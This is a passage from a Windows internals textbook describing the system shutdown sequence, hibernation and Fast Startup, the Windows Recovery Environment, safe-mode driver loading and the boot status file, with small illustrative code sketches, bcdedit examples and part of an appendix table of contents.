currently running and, if available, their current state. Windows indicates which program isn't shut-
ting down in a timely manner and gives the user a choice of either killing the process or aborting the
shutdown. (There is no timeout on this screen, which means that a shutdown request could wait forever
at this point.) Additionally, third-party applications can add their own specific information regarding
state; for example, a virtualization product could display the number of actively running virtual ma-
chines (using the ShutdownBlockReasonCreate API).
FIGURE 12-14 Hung-program screen.
EXPERIMENT: Witnessing the HungAppTimeout
You can see the use of the HungAppTimeout registry value by running Notepad, entering text
into its editor, and then logging off. After the amount of time specified by the HungAppTimeout
registry value has expired, Csrss.exe presents a prompt that asks you whether you want to end
the Notepad process, which has not exited because it's waiting for you to tell it whether to save
the entered text to a file. If you select Cancel, Csrss.exe aborts the shutdown.
As a second experiment, if you try shutting down again (with Notepad's query dialog box still
open), Notepad displays its own message box to inform you that shutdown cannot cleanly proceed.
However, this dialog box is merely an informational message to help users; Csrss.exe will still con-
sider that Notepad is hung and display the user interface to terminate unresponsive processes.
If the thread does exit before the timeout, Csrss continues sending the WM_QUERYENDSESSION/
WM_ENDSESSION message pairs to the other threads in the process that own windows. Once all the
threads that own windows in the process have exited, Csrss terminates the process and goes on to the
next process in the interactive session.
If Csrss finds a console application, it invokes the console control handler by sending the
CTRL_LOGOFF_EVENT event. (Only service processes receive the CTRL_SHUTDOWN_EVENT event on
shutdown.) If the handler returns FALSE, Csrss kills the process. If the handler returns TRUE or doesn't
respond by the number of seconds defined by HKCU\Control Panel\Desktop\WaitToKillTimeout (the
default is 5,000 milliseconds), Csrss displays the hung-program screen shown in Figure 12-14.
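The console-application branch above reduces to a small decision table, sketched here with invented names and outcome labels (the timeout constant reflects the default stated in the text):

```python
# Decision-table sketch of how Csrss treats a console app's control
# handler during shutdown (labels are ours, not Windows terminology).
WAIT_TO_KILL_TIMEOUT_MS = 5000   # default HKCU\Control Panel\Desktop\WaitToKillTimeout

def console_shutdown_outcome(handler_result, response_time_ms):
    """handler_result is True, False, or None when the handler never answered."""
    if handler_result is None or response_time_ms >= WAIT_TO_KILL_TIMEOUT_MS:
        return "hung-program screen"     # no timely response
    if handler_result is False:
        return "killed"                  # FALSE: Csrss kills the process
    return "hung-program screen"         # TRUE also leads to the screen

print(console_shutdown_outcome(False, 100))   # -> killed
```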
Next, the Winlogon state machine calls ExitWindowsEx to have Csrss terminate any COM processes
that are part of the interactive user's session.
At this point, all the processes in the interactive user's session have been terminated. Wininit next
calls ExitWindowsEx, which this time executes within the system process context. This causes Wininit
to send a message to the Csrss part of session 0, where the services live. Csrss then looks at all the pro-
cesses belonging to the system context and sends the WM_QUERYENDSESSION/
WM_ENDSESSION messages to GUI threads (as before). Instead of sending CTRL_LOGOFF_EVENT,
however, it sends CTRL_SHUTDOWN_EVENT to console applications that have registered control
handlers. Note that the SCM is a console program that registers a control handler. When it receives the
shutdown request, it in turn sends the service shutdown control message to all services that registered
for shutdown notification. For more details on service shutdown (such as the shutdown timeout Csrss
uses for the SCM), see the Services section in Chapter 10.
Although Csrss performs the same timeouts as when it was terminating the user processes, it
doesn’t display any dialog boxes and doesn’t kill any processes. (The registry values for the system pro-
cess timeouts are taken from the default user profile.) These timeouts simply allow system processes
a chance to clean up and exit before the system shuts down. Therefore, many system processes are in
fact still running when the system shuts down, such as Smss, Wininit, Services, and LSASS.
Once Csrss has finished its pass notifying system processes that the system is shutting down,
Wininit wakes up, waits 60 seconds for all sessions to be destroyed, and then, if needed, invokes System
Restore (at this stage no user process is active in the system, so the restore application can process all
the needed files that may have been in use before). Wininit finishes the shutdown process by shutting
down LogonUI and calling the executive subsystem function NtShutdownSystem. This function calls the
function PoSetSystemPowerState to orchestrate the shutdown of drivers and the rest of the executive
subsystems (Plug and Play manager, power manager, executive, I/O manager, configuration manager,
and memory manager).
For example, PoSetSystemPowerState calls the I/O manager to send shutdown I/O packets to all
device drivers that have requested shutdown notification. This action gives device drivers a chance to
perform any special processing their device might require before Windows exits. The stacks of worker
threads are swapped in, the configuration manager flushes any modified registry data to disk, and the
memory manager writes all modified pages containing file data back to their respective files. If the
option to clear the paging file at shutdown is enabled, the memory manager clears the paging file at
this time. The I/O manager is called a second time to inform the file system drivers that the system is
shutting down. System shutdown ends in the power manager. The action the power manager takes
depends on whether the user specified a shutdown, a reboot, or a power down.
Modern apps all rely on the Windows Shutdown Interface (WSI) to properly shut down the sys-
tem. The WSI API still uses RPC to communicate between processes and supports the grace period.
The grace period is a mechanism by which the user is informed of an incoming shutdown, before the
shutdown actually begins. This mechanism is used even in case the system needs to install updates.
Advapi32 uses WSI to communicate with Wininit. Wininit queues a timer, which fires at the end of the
grace period and calls Winlogon to initialize the shutdown request. Winlogon calls ExitWindowsEx, and
the rest of the procedure is identical to the previous one. All the UWP applications (and even the new
Start menu) use the ShutdownUX module to switch off the system. ShutdownUX manages the power
transitions for UWP applications and is linked against Advapi32.dll.
Hibernation and Fast Startup
To improve the system startup time, Windows 8 introduced a new feature called Fast Startup (also
known as hybrid boot). In previous Windows editions, if the hardware supported the S4 system power-
state (see Chapter 6 of Part 1 for further details about the power manager), Windows allowed the user
to put the system in hibernation mode. To properly understand Fast Startup, a complete description of
the hibernation process is needed.
When a user or an application calls the SetSuspendState API, a worker item is sent to the power man-
ager. The worker item contains all the information needed by the kernel to initialize the power state
transition. The power manager informs the prefetcher of the outstanding hibernation request and
waits for all its pending I/Os to complete. It then calls the NtSetSystemPowerState kernel API.
NtSetSystemPowerState is the key function that orchestrates the entire hibernation process. The
routine checks that the caller token includes the Shutdown privilege, synchronizes with the Plug and
Play manager, Registry, and power manager (in this way there is no risk that any other transactions
could interfere in the meantime), and cycles against all the loaded drivers, sending an IRP_MN_QUERY_
POWER Irp to each of them. In this way the power manager informs each driver that a power operation
is started, so the driver's devices must not start any more I/O operations or take any other action that
would prevent the successful completion of the hibernation process. If one of the requests fails (per-
haps a driver is in the middle of an important I/O), the procedure is aborted.
The power manager uses an internal routine that modifies the system boot configuration data (BCD)
to enable the Windows Resume boot application, which, as the name implies, attempts to resume the
system after the hibernation. (For further details, see the section “The Windows Boot Manager” earlier
in this chapter). The power manager:
I
Opens the BCD object used to boot the system and reads the associated Windows Resume
application GUID (stored in a special unnamed BCD element that has the value 0x23000003).
I
Searches the Resume object in the BCD store, opens it, and checks its description. Writes the
device and path BCD elements, linking them to the WindowsSystem32winresume.efi file lo-
cated in the boot disk, and propagates the boot settings from the main system BCD object (like
the boot debugger options). Finally, it adds the hibernation file path and device descriptor into the
filepath and filedevice BCD elements.
I
Updates the root Boot Manager BCD object: writes the resumeobject BCD element with the
GUID of the discovered Windows Resume boot application, sets the resume element to 1, and, in
case the hibernation is used for Fast Startup, sets the hiberboot element to 1.
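The three BCD updates listed above can be sketched as operations on a plain dictionary standing in for the BCD store. Everything here is a hedged illustration: the GUID, the helper name, and the dictionary layout are invented, and only the element names (filepath, resumeobject, resume, hiberboot) come from the text:

```python
# Illustrative model of the power manager's BCD edits before hibernation.
WINRESUME_PATH = r"\Windows\System32\winresume.efi"

def prepare_resume_bcd(store, resume_guid, hiber_file_path, fast_startup):
    """store: dict of BCD object -> dict of element name -> value."""
    # Point the Windows Resume application at winresume.efi and the
    # hibernation file (filepath element).
    resume_obj = store.setdefault(resume_guid, {})
    resume_obj["path"] = WINRESUME_PATH
    resume_obj["filepath"] = hiber_file_path
    # Update the root Boot Manager object: resumeobject, resume, and,
    # for Fast Startup, hiberboot.
    bootmgr = store.setdefault("{bootmgr}", {})
    bootmgr["resumeobject"] = resume_guid
    bootmgr["resume"] = 1
    if fast_startup:
        bootmgr["hiberboot"] = 1
    return store

guid = "{00000000-0000-0000-0000-000000000001}"   # invented example GUID
store = prepare_resume_bcd({}, guid, r"\hiberfil.sys", fast_startup=True)
print(store["{bootmgr}"]["resume"], store["{bootmgr}"].get("hiberboot"))
```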
Next, the power manager flushes the BCD data to disk, calculates all the physical memory ranges
that need to be written into the hibernation file (a complex operation not described here), and sends a
new power IRP to each driver (IRP_MN_SET_POWER function). This time the drivers must put their de-
vice to sleep and don't have the chance to fail the request and stop the hibernation process. The system
is now ready to hibernate, so the power manager starts a “sleeper” thread that has the sole purpose of
powering the machine down. It then waits for an event that will be signaled only when the resume is
completed (and the system is restarted by the user).
The sleeper thread halts all the CPUs (through DPC routines) except its own, captures the system
time, disables interrupts, and saves the CPU state. It finally invokes the power state handler routine
(implemented in the HAL), which executes the ACPI machine code needed to put the entire system to
sleep and calls the routine that actually writes all the physical memory pages to disk. The sleeper thread
uses the crash dump storage driver to emit the needed low-level disk I/Os for writing the data in the
hibernation file.
The Windows Boot Manager, in its earlier boot stages, recognizes the resume BCD element (stored
in the Boot Manager BCD descriptor), opens the Windows Resume boot application BCD object, and
reads the saved hibernation data. Finally, it transfers the execution to the Windows Resume boot ap-
plication (Winresume.efi). HbMain, the entry point routine of Winresume, reinitializes the boot library
and performs different checks on the hibernation file:
I
Verifies that the file has been written by the same executing processor architecture
I
Checks whether a valid page file exists and has the correct size
I
Checks whether the firmware has reported some hardware configuration changes (through the
FADT and FACS ACPI tables)
I
Checks the hibernation file integrity
If one of these checks fails, Winresume ends the execution and returns control to the Boot Manager,
which discards the hibernation file and restarts a standard cold boot. On the other hand, if all the previ-
ous checks pass, Winresume reads the hibernation file (using the UEFI boot library) and restores all the
saved physical pages contents. Next, it rebuilds the needed page tables and memory data structures,
copies the needed information to the OS context, and finally transfers the execution to the Windows ker-
nel, restoring the original CPU context. The Windows kernel code restarts from the same power manager
sleeper thread that originally hibernated the system. The power manager reenables interrupts and thaws
all the other system CPUs. It then updates the system time, reading it from the CMOS, rebases all the
system timers (and watchdogs), and sends another IRP_MN_SET_POWER Irp to each system driver, asking
them to restart their devices. It finally restarts the prefetcher and sends it the boot loader log for further
processing. The system is now fully functional: the system power state is S0 (fully on).
Fast Startup is a technology that's implemented using hibernation. When an application passes
the EWX_HYBRID_SHUTDOWN flag to the ExitWindowsEx API or when a user clicks the Shutdown
start menu button, if the system supports the S4 (hibernation) power state and has a hibernation file
enabled, it starts a hybrid shutdown. After Csrss has switched off all the interactive session processes,
session 0 services, and COM servers (see the Shutdown section for all the details about the actual
shutdown process), Winlogon detects that the shutdown request has the Hybrid flag set, and, instead
of waking up the shutdown code of Wininit, it goes into a different route. The new Winlogon state
uses the NtPowerInformation system API to switch off the monitor; it next informs LogonUI about the
outstanding hybrid shutdown, and finally calls the NtInitiatePowerAction API, asking for a system
hibernation. The procedure from now on is the same as the system hibernation.
EXPERIMENT: Understanding hybrid shutdown
You can see the effects of a hybrid shutdown by manually mounting the BCD store after the system
has been switched off, using an external OS. First, make sure that your system has Fast Startup
enabled. To do this, type Control Panel in the Start menu search box, select System and Security,
and then select Power Options. After clicking Choose What The Power Button does, located in
the upper-left side of the Power Options window, the following screen should appear:
As shown in the figure, make sure that the Turn On Fast Startup option is selected.
Otherwise, your system will perform a standard shutdown. You can shut down your workstation
using the power button located in the left side of the Start menu. Before the computer shuts
down, you should insert a DVD or USB flash drive that contains the external OS (a copy of a live
Linux should work well). For this experiment, you can’t use the Windows Setup Program (or any
WinRE based environments) because the setup procedure clears all the hibernation data before
mounting the system volume.
When you switch on the workstation, perform the boot from an external DVD or USB drive.
This procedure varies between different PC manufacturers and usually requires accessing the
BIOS interface. For instructions on accessing the BIOS and performing the boot from an external
drive, check your workstation’s user manual. (For example, in the Surface Pro and Surface Book
laptops, usually it’s sufficient to press and hold the Volume Up button before pushing and releas-
ing the Power button for entering the BIOS configuration.) When the new OS is ready, mount
the main UEFI system partition with a partitioning tool (depending on the OS type). We don’t
describe this procedure. After the system partition has been correctly mounted, copy the system
Boot Configuration Data file, located in \EFI\Microsoft\Boot\BCD, to an external drive (or in the
same USB flash drive used for booting). Then you can restart your PC and wait for Windows to
resume from hibernation.
After your PC restarts, run the Registry Editor and open the root HKEY_LOCAL_MACHINE
registry key. Then from the File menu, select Load Hive. Browse for your saved BCD file, select
Open, and assign the BCD key name for the new loaded hive. Now you should identify the main
Boot Manager BCD object. In all Windows systems, this root BCD object has the 9DEA862C-
5CDD-4E70-ACC1-F32B344D4795 GUID. Open the relative key and its Elements subkey. If the
system has been correctly switched off with a hybrid shutdown, you should see the resume and
hiberboot BCD elements (the corresponding key names are 26000005 and 26000025; see Table
12-2 for further details) with their Element registry value set to 1.
To properly locate the BCD element that corresponds to your Windows Installation, use the
displayorder element (key named 24000001), which lists all the installed OS boot entries. In
the Element registry value, there is a list of all the GUIDs of the BCD objects that describe the
installed operating systems loaders. Check the BCD object that describes the Windows Resume
application, reading the GUID value of the resumeobject BCD element (which corresponds to the
23000006 key). The BCD object with this GUID includes the hibernation file path into the filepath
element, which corresponds to the key named 22000002.
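The element-name-to-key-name pairs used in the experiment above can be collected in a small lookup table, handy when navigating the loaded hive by hand. The values are taken directly from the text; the helper function is our own convenience, not a Windows tool:

```python
# BCD element names mentioned in the experiment and the hexadecimal
# key names they appear under in the loaded BCD hive.
BCD_ELEMENT_KEYS = {
    "resume":       "26000005",
    "hiberboot":    "26000025",
    "displayorder": "24000001",
    "resumeobject": "23000006",
    "filepath":     "22000002",
}

def element_key(name):
    """Return the registry key name for a BCD element name."""
    return BCD_ELEMENT_KEYS[name]

print(element_key("hiberboot"))   # -> 26000025
```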
Windows Recovery Environment (WinRE)
The Windows Recovery Environment provides an assortment of tools and automated repair technolo-
gies to fix the most common startup problems. It includes six main tools:
I
System Restore Allows restoring to a previous restore point in cases in which you can’t boot
the Windows installation to do so, even in safe mode.
I
System Image Recover Called Complete PC Restore or Automated System Recovery (ASR) in
previous versions of Windows, this restores a Windows installation from a complete backup, not
just from a system restore point, which might not contain all damaged files and lost data.
I
Startup Repair An automated tool that detects the most common Windows startup prob-
lems and automatically attempts to repair them.
I
PC Reset A tool that removes all the applications and drivers that don’t belong to the stan-
dard Windows installation, restores all the settings to their default, and brings back Windows to
its original state after the installation. The user can choose to maintain all personal data files or
remove everything. In the latter case, Windows will be automatically reinstalled from scratch.
I
Command Prompt For cases where troubleshooting or repair requires manual intervention
(such as copying files from another drive or manipulating the BCD), you can use the command
prompt to have a full Windows shell that can launch almost any Windows program (as long as
the required dependencies can be satisfied), unlike the Recovery Console on earlier versions of
Windows, which only supported a limited set of specialized commands.
I
Windows Memory Diagnostic Tool Performs memory diagnostic tests that check for signs
of faulty RAM. Faulty RAM can be the reason for random kernel and application crashes and
erratic system behavior.
When you boot a system from the Windows DVD or boot disks, Windows Setup gives you the choice
of installing Windows or repairing an existing installation. If you choose to repair an installation, the
system displays a screen similar to the modern boot menu (shown in Figure 12-15), which provides dif-
ferent choices.
The user can select to boot from another device, use a different OS (if correctly registered in the
system BCD store), or choose a recovery tool. All the described recovery tools (except for the Memory
Diagnostic Tool) are located in the Troubleshoot section.
The Windows setup application also installs WinRE to a recovery partition on a clean system installa-
tion. You can access WinRE by keeping the Shift key pressed when rebooting the computer through the
relative shutdown button located in the Start menu. If the system uses the Legacy Boot menu, WinRE
can be started using the F8 key to access advanced boot options during Bootmgr execution. If you see
the Repair Your Computer option, your machine has a local hard disk copy. Additionally, if your system
failed to boot as the result of damaged files or for any other reason that Winload can understand, it in-
structs Bootmgr to automatically start WinRE at the next reboot cycle. Instead of the dialog box shown
in Figure 12-15, the recovery environment automatically launches the Startup Repair tool, shown in
Figure 12-16.
FIGURE 12-15 The Windows Recovery Environment startup screen.
FIGURE 12-16 The Startup Recovery tool.
At the end of the scan and repair cycle, the tool automatically attempts to fix any damage found,
including replacing system files from the installation media. If the Startup Repair tool cannot automati-
cally fix the damage, you get a chance to try other methods, and the System Recovery Options dialog
box is displayed again.
The Windows Memory Diagnostics Tool can be launched from a working system or from a
Command Prompt opened in WinRE using the mdsched.exe executable. The tool asks the user if they
want to reboot the computer to run the test. If the system uses the Legacy Boot menu, the Memory
Diagnostics Tool can be executed using the Tab key to navigate to the Tools section.
Safe mode
Perhaps the most common reason Windows systems become unbootable is that a device driver crashes
the machine during the boot sequence. Because software or hardware configurations can change over
time, latent bugs can surface in drivers at any time. Windows offers a way for an administrator to attack
the problem: booting in safe mode. Safe mode is a boot configuration that consists of the minimal set
of device drivers and services. By relying on only the drivers and services that are necessary for boot-
ing, Windows avoids loading third-party and other nonessential drivers that might crash.
There are different ways to enter safe mode:
■ Boot the system in WinRE and select Startup Settings in the Advanced options (see
Figure 12-17).
FIGURE 12-17 The Startup Settings screen, in which the user can select three different kinds of safe mode.
■ In multi-boot environments, select Change defaults or choose other options in the modern
boot menu and go to the Troubleshoot section to select the Startup Settings button as in the
previous case.
■ If your system uses the Legacy Boot menu, press the F8 key to enter the Advanced Boot
Options menu.
You typically choose from three safe-mode variations: Safe mode, Safe mode with networking, and
Safe mode with command prompt. Standard safe mode includes the minimum number of device driv-
ers and services necessary to boot successfully. Networking-enabled safe mode adds network drivers and
services to the drivers and services that standard safe mode includes. Finally, safe mode with command
prompt is identical to standard safe mode except that Windows runs the Command Prompt application
(Cmd.exe) instead of Windows Explorer as the shell when the system enables GUI mode.
Windows includes a fourth safe mode, Directory Services Restore mode, which is different from
the standard and networking-enabled safe modes. You use Directory Services Restore mode to boot
the system into a mode where the Active Directory service of a domain controller is offline and
unopened. This allows you to perform repair operations on the database or restore it from backup media.
All drivers and services, with the exception of the Active Directory service, load during a Directory
Services Restore mode boot. In cases when you can’t log on to a system because of Active Directory
database corruption, this mode enables you to repair the corruption.
Driver loading in safe mode
How does Windows know which device drivers and services are part of standard and networking-
enabled safe mode? The answer lies in the HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot registry
key. This key contains the Minimal and Network subkeys. Each subkey contains more subkeys that
specify the names of device drivers or services or of groups of drivers. For example, the BasicDisplay.sys
subkey identifies the Basic display device driver that the startup configuration includes. The Basic
display driver provides basic graphics services for any PC-compatible display adapter. The system uses
this driver as the safe-mode display driver in lieu of a driver that might take advantage of an adapter’s
advanced hardware features but that might also prevent the system from booting. Each subkey under
the SafeBoot key has a default value that describes what the subkey identifies; the BasicDisplay.sys
subkey's default value is Driver.
The Boot file system subkey has as its default value Driver Group. When developers design a device
driver’s installation script (.inf file), they can specify that the device driver belongs to a driver group. The
driver groups that a system defines are listed in the List value of the HKLM\SYSTEM\CurrentControlSet\
Control\ServiceGroupOrder key. A developer specifies a driver as a member of a group to indicate to
Windows at what point during the boot process the driver should start. The ServiceGroupOrder key's
primary purpose is to define the order in which driver groups load; some driver types must load either
before or after other driver types. The Group value beneath a driver’s configuration registry key associ-
ates the driver with a group.
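The interaction between the ServiceGroupOrder List value and each driver's Group value can be sketched in a few lines. This is an illustrative model, not the kernel's actual code: the group names are real load-order groups, but the driver-to-group mapping is a hypothetical stand-in for data normally read from the registry.

```python
# Illustrative model of ServiceGroupOrder-based driver ordering.

# Simulated List value of HKLM\SYSTEM\CurrentControlSet\Control\ServiceGroupOrder
service_group_order = [
    "System Reserved",
    "Boot Bus Extender",
    "Boot File System",
    "File System",
    "Video",
]

# Simulated Group value beneath each driver's key under ...\Services
driver_groups = {
    "BasicDisplay": "Video",
    "Ntfs": "Boot File System",
    "cdfs": "File System",
    "pci": "Boot Bus Extender",
}

def load_order(driver_groups, group_list):
    """Sort drivers by their group's position in the ServiceGroupOrder list,
    which is how Windows decides the relative start order of driver groups."""
    rank = {group: i for i, group in enumerate(group_list)}
    return sorted(driver_groups, key=lambda name: rank[driver_groups[name]])

print(load_order(driver_groups, service_group_order))
# ['pci', 'Ntfs', 'cdfs', 'BasicDisplay']
```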
Driver and service configuration keys reside beneath HKLM\SYSTEM\CurrentControlSet\Services.
If you look under this key, you'll find the BasicDisplay key for the basic display device driver, which you
can see in the registry is a member of the Video group. Any file system drivers that Windows requires
for access to the Windows system drive are automatically loaded as if part of the Boot file system
group. Other file system drivers are part of the File System group, which the standard and networking-
enabled safe-mode configurations also include.
When you boot into a safe-mode configuration, the boot loader (Winload) passes an associated switch
to the kernel (Ntoskrnl.exe) as a command-line parameter, along with any switches you’ve specified in the
BCD for the installation you're booting. If you boot into any safe mode, Winload sets the safeboot BCD
option with a value describing the type of safe mode you select. For standard safe mode, Winload sets
minimal, and for networking-enabled safe mode, it adds network. Winload adds minimal and sets
safebootalternateshell for safe mode with command prompt and dsrepair for Directory Services Restore mode.
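The same safeboot selections can be made by hand on a working system with BCDEdit; the options below are documented BCD settings (run from an elevated command prompt, acting here on the current boot entry):

```shell
rem Standard safe mode on the next boot
bcdedit /set {current} safeboot minimal

rem Networking-enabled safe mode
bcdedit /set {current} safeboot network

rem Safe mode with command prompt: minimal plus the alternate shell
bcdedit /set {current} safeboot minimal
bcdedit /set {current} safebootalternateshell yes

rem Directory Services Restore mode (domain controllers)
bcdedit /set {current} safeboot dsrepair

rem Return to normal booting
bcdedit /deletevalue {current} safeboot
bcdedit /deletevalue {current} safebootalternateshell
```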
Note An exception exists regarding the drivers that safe mode excludes from a boot.
Winload, rather than the kernel, loads any drivers with a Start value of 0 in their registry key,
which specifies loading the drivers at boot time. Winload doesn’t check the SafeBoot registry
key because it assumes that any driver with a Start value of 0 is required for the system to
boot successfully. Because Winload doesn’t check the SafeBoot registry key to identify which
drivers to load, Winload loads all boot-start drivers (and later Ntoskrnl starts them).
The Windows kernel scans the boot parameters in search of the safe-mode switches at the end of
phase 1 of the boot process (Phase1InitializationDiscard; see the "Kernel initialization phase 1" section
earlier in this chapter), and sets the internal variable InitSafeBootMode to a value that reflects the switches
it finds. During the InitSafeBoot function, the kernel writes the InitSafeBootMode value to the registry
value HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option\OptionValue so that user-mode
components, such as the SCM, can determine what boot mode the system is in. In addition, if the system
is booting in safe mode with command prompt, the kernel sets the HKLM\SYSTEM\CurrentControlSet\
Control\SafeBoot\Option\UseAlternateShell value to 1. The kernel records the parameters that Winload
passes to it in the value HKLM\SYSTEM\CurrentControlSet\Control\SystemStartOptions.
When the I/O manager kernel subsystem loads device drivers that HKLM\SYSTEM\CurrentControlSet\
Services specifies, the I/O manager executes the function IopLoadDriver. When the Plug and Play manager
detects a new device and wants to dynamically load the device driver for the detected device, the Plug
and Play manager executes the function PipCallDriverAddDevice. Both these functions call the function
IopSafebootDriverLoad before they load the driver in question. IopSafebootDriverLoad checks the value
of InitSafeBootMode and determines whether the driver should load. For example, if the system boots in
standard safe mode, IopSafebootDriverLoad looks for the driver's group, if the driver has one, under the
Minimal subkey. If IopSafebootDriverLoad finds the driver's group listed, IopSafebootDriverLoad indicates
to its caller that the driver can load. Otherwise, IopSafebootDriverLoad looks for the driver's name under
the Minimal subkey. If the driver's name is listed as a subkey, the driver can load. If IopSafebootDriverLoad
can't find the driver group or driver name subkeys, the driver will not be loaded. If the system boots in
networking-enabled safe mode, IopSafebootDriverLoad performs the searches on the Network subkey.
If the system doesn't boot in safe mode, IopSafebootDriverLoad lets all drivers load.
Safe-mode-aware user programs
When the SCM user-mode component (which Services.exe implements) initializes during the
boot process, the SCM checks the value of HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\
Option\OptionValue to determine whether the system is performing a safe-mode boot. If so, the SCM
mirrors the actions of IopSafebootDriverLoad. Although the SCM processes the services listed under
HKLM\SYSTEM\CurrentControlSet\Services, it loads only services that the appropriate safe-mode
subkey specifies by name. You can find more information on the SCM initialization process in the sec-
tion Services in Chapter 10.
Userinit, the component that initializes a user's environment when the user logs on (%SystemRoot%\
System32\Userinit.exe), is another user-mode component that needs to know whether the system is
booting in safe mode. It checks the value of HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\
Option\UseAlternateShell. If this value is set, Userinit runs the program specified as the user's shell in
the value HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\AlternateShell rather than executing
Explorer.exe. Windows writes the program name Cmd.exe to the AlternateShell value during installa-
tion, making the Windows command prompt the default shell for safe mode with command prompt.
Even though the command prompt is the shell, you can type Explorer.exe at the command prompt to
start Windows Explorer, and you can run any other GUI program from the command prompt as well.
How does an application determine whether the system is booting in safe mode? By calling the
Windows GetSystemMetrics(SM_CLEANBOOT) function. Batch scripts that need to perform certain
operations when the system boots in safe mode look for the SAFEBOOT_OPTION environment variable
because the system defines this environment variable only when booting in safe mode.
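A script can apply the SAFEBOOT_OPTION check like this. This is a minimal Python sketch; on Windows the variable's value reflects the safe-mode variant selected (for example, MINIMAL or NETWORK), and the variable is simply absent on a normal boot.

```python
import os

def safe_mode_type():
    """Return the safe-mode variant reported by the SAFEBOOT_OPTION
    environment variable, or None on a normal boot. Windows defines the
    variable only when the system was booted into safe mode."""
    return os.environ.get("SAFEBOOT_OPTION")

mode = safe_mode_type()
print("Normal boot" if mode is None else f"Safe mode: {mode}")
```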
Boot status file
Windows uses a boot status file (%SystemRoot%\Bootstat.dat) to record the fact that it has progressed
through various stages of the system life cycle, including boot and shutdown. This allows the Boot
Manager, Windows loader, and Startup Repair tool to detect abnormal shutdown or a failure to shut
down cleanly and offer the user recovery and diagnostic boot options, like the Windows Recovery
environment. This binary file contains information through which the system reports the success of the
following phases of the system life cycle:
■ Boot
■ Shutdown and hybrid shutdown
■ Resume from hibernate or suspend
The boot status file also indicates whether a problem was detected the last time the user attempted
to boot the operating system and the recovery options shown, indicating that the user has been made
aware of the problem and taken action. Runtime Library APIs (Rtl) in Ntdll.dll contain the private inter-
faces that Windows uses to read from and write to the file. Like the BCD, it cannot be edited by users.
Conclusion
In this chapter, we examined the detailed steps involved in starting and shutting down Windows (both
normally and in error cases). A lot of new security technologies have been designed and implemented
with the goal of keeping the system safe even in its early startup stages and rendering it immune
to a variety of external attacks. We examined the overall structure of Windows and the core system
mechanisms that get the system going, keep it running, and eventually shut it down, including the fast shutdown paths.
A P P E N D I X
Contents of Windows Internals,
Seventh Edition, Part 1
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xi
Chapter 1  Concepts and tools    1
Windows operating system versions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Windows 10 and future Windows versions . . . . . . . . . . . . . . . . . . . . . . . . 3
Windows 10 and OneCore . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Foundation concepts and terms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Windows API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Services, functions, and routines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
Processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
Jobs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .20
Virtual memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
Kernel mode vs. user mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .23
Hypervisor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
Firmware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .29
Terminal Services and multiple sessions . . . . . . . . . . . . . . . . . . . . . . . . . .29
Objects and handles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .30
Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
Registry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .32
Unicode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .33
Digging into Windows internals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
Performance Monitor and Resource Monitor . . . . . . . . . . . . . . . . . . . . .36
Kernel debugging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .38
Windows Software Development Kit . . . . . . . . . . . . . . . . . . . . . . . . . . . . .43
Windows Driver Kit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .43
Sysinternals tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44
852
Contents of Windows Internals, Part 1, 7th Edition
Chapter 2  System architecture    45
Requirements and design goals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .45
Operating system model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .46
Architecture overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
Portability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .50
Symmetric multiprocessing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
Scalability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .53
Differences between client and server versions . . . . . . . . . . . . . . . . . . .54
Checked build . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
Virtualization-based security architecture overview . . . . . . . . . . . . . . . . . . . . 59
Key system components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
Environment subsystems and subsystem DLLs . . . . . . . . . . . . . . . . . . . .62
Other subsystems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .68
